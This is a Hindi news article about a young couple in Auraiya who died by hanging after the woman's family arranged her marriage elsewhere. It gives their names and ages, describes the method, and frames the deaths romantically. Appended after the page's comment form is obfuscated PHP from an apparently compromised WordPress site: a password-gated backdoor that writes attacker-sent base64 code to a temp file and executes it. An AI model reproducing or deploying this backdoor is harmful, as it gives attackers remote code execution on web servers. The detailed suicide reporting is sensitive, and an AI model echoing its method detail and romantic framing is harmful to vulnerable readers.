बंदिशों ने खत्म की कहानी…मौत ने मिलाया: प्रेमिका की मौत से गमजदा प्रेमी ने भी की खुदकुशी

Uttarakhand Press 04 September 2023: औरैया जिले में अजीतमल कोतवाली क्षेत्र के अमावता में रविवार सुबह एक युवती ने दूसरी जगह शादी तय होने पर घर में दुपट्टे से फंदा लगाकर जान दे दी। इसकी जानकारी होने पर प्रेमी ने भी गांव के बाहर नहर के किनारे आम के पेड़ से फंदा लगाकर आत्महत्या कर ली। सूचना पर पहुंची पुलिस ने दोनों शवों को पोस्टमार्टम के लिए भेजा।

अजीतमल कोतवाली क्षेत्र के अमावता निवासी महावीर की बेटी अंजू (19) गांव के ही जन सहयोगी इंटर कॉलेज से इंटरमीडिएट की पढ़ाई पूरी की थी। पिता महावीर ने पुलिस को बताया कि उसके दो पुत्र प्रदीप व आदेश बाहर नौकरी करते हैं। वह घर पर पत्नी कुसमा व बेटी अंजू के साथ रहते थे।

रविवार सुबह आठ बजे पत्नी खेतों पर काम करने चली गई। इसके बाद वह भी मनरेगा में मजदूरी करने के लिए निकल गए। 11 बजे के करीब बेटी की सहेलियां अंजू को घर बुलाने पहुंचीं, तो उन्होंने बेटी को कमरे में पंखे पर फंदे से लटकता देखा। इस पर वह चीखने लगीं। चीख पुकार सुनकर पड़ोसी भी मौके पर पहुंच गए।
आम के पेड़ पर लटका था शव:
जानकारी पर माता पिता भी घर पहुंचे और लोगों की मदद से शव को फंदे से नीचे उतारा। सूत्रों के अनुसार शनिवार को अंजू के बहनोई दूसरी जगह उसका रिश्ता तय करने को लेकर घर आए थे। यह बात अंजू को नगवार गुजरी। पशुपालकों ने नहर के पास खेत में आम के पेड़ पर गांव निवासी कन्हैया (20) का शव फंदे पर लटकता देखा।

10वीं पास करने के बाद छोड़ दी थी पढ़ाई:
इस पर ग्रामीणों ने कन्हैया के भाई रामकेवल, घनश्याम को सूचना दी। सूचना पर बहन कीर्ति व मां शकुंतला रोती-बिलखती हुई पहुंच गईं। पुलिस ने युवक का शव फंदे से उतरवाया। मृतक की मां शकुंतला ने बताया कि कन्हैया ने गांव के जन सहयोगी इंटर कॉलेज से 10वीं पास करने के बाद से पढ़ाई छोड़ दी थी।

पोस्टमार्टम रिपोर्ट आने पर ही स्पष्ट हो सकेगा कारण:
भाई वीरू ने पुलिस को बताया कि उसके भाई का गांव की युवती से प्रेम प्रसंग था। सुबह युवती के फांसी लगाने की जानकारी मिलने से क्षुब्द होकर भाई ने भी आत्महत्या कर ली है। सीओ भरत पासवान ने बताया दोनों की मौत का कारण पोस्टमार्टम रिपोर्ट आने पर ही स्पष्ट हो सकेगा। अभी तक किसी भी पक्ष से तहरीर नहीं दी गई है। तहरीर व पोस्टमार्टम रिपोर्ट के आधार पर कार्रवाई की जाएगी।

बंदिशों ने मिटा दी प्रमी युगल की हस्ती:
अजीतमल कोतवाली क्षेत्र के अमावता में प्रेमिका के आत्महत्या करने के बाद प्रेमी के भी जिंदगी को अलविदा कह दिया। इसके बाद से दोनों के घरों में कोहराम मचा रहा है। देर शाम को दोनों के शव पोस्टमार्टम के बाद घर पहुंचे। दोनों के परिजनों ने एक ही घाट पर दोनों के शवों का अंतिम संस्कार किया। चिताओं से उठती आग देख हर एक आंख आंसू से छलक आई।

एक ही घाट पर लगी दोनों की अर्थी:
देर शाम को पोस्टमार्टम के बाद दोनों के शव गांव पहुंचने पर कोहराम मच गया। देर शाम पहले अंजू के परिजन उसकी अर्थी लेकर सिकरोड़ी घाट के लिए निकले। इसके पीछे कन्हैया की अर्थी उठाई गई। दोनों की अर्थी आगे पीछे उठती देख हर एक भावुक दिखा। सिकरोड़ी घाट पर पुलिस की मौजूदगी में दोनों की अर्थियां कुछ दूरी पर लगाईं गईं।

दूसरी जगह शादी तय कराया जाना बना मौत का कारण:
सूत्रों के अनुसार अंजू के परिजन उसकी शादी कहीं और करना चाहते थे। रिश्ता तय करने के लिए बीते सप्ताह अंजू के जीजा उसकी फोटो लेने आए थे। अंजू के विरोध करने पर उसके पिता ने उसे डांट दिया था। माता-पिता के घर से जाने के बाद अंजू ने फंदा लगाकर जान दे दी। कन्हैया प्रेमिका की मौत का दुख बर्दास्त नहीं कर सका। इस पर उसने भी गांव के बाहर अपनी जीवन लीला को समाप्त कर लिया।

प्रेमी की भी मौत होने की जानकारी पर रास्ते से लौटाया गया प्रेमिका का शव:
अंजू की मौत होने पर परिजनों ने लोकलाज के डर से पुलिस को बिना सूचना दिए शव को फंदे से उतार लिया और अंतिम संस्कार के लिए शव को लेकर सिकरोड़ी घाट की ओर निकल गए। तभी ग्रामीणों ने कन्हैया के भी आत्महत्या करने की जानकारी परिजनों को दी। इस पर परिजन आधे रास्ते से ही शव को वापस घर लेकर आए। इधर मौके पर पहुंची पुलिस ने दोनों घटना स्थल से फोरेंसिक टीम की मदद से साक्ष्य जुटाए हैं। पुलिस मामले की जांच में जुटी है।

Read Previous

बरेली के युवक ने सोशल मीडिया पर दी धीरेंद्र कृष्ण शास्त्री को जान से मारने की धमकी, गिरफ्तार

Read Next

Uttarakhand: नैनीताल में फिर दरक गई नयना पीक पहाड़ी, लोगों में दहशत, प्रशासन की अनदेखी पर सवाल

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}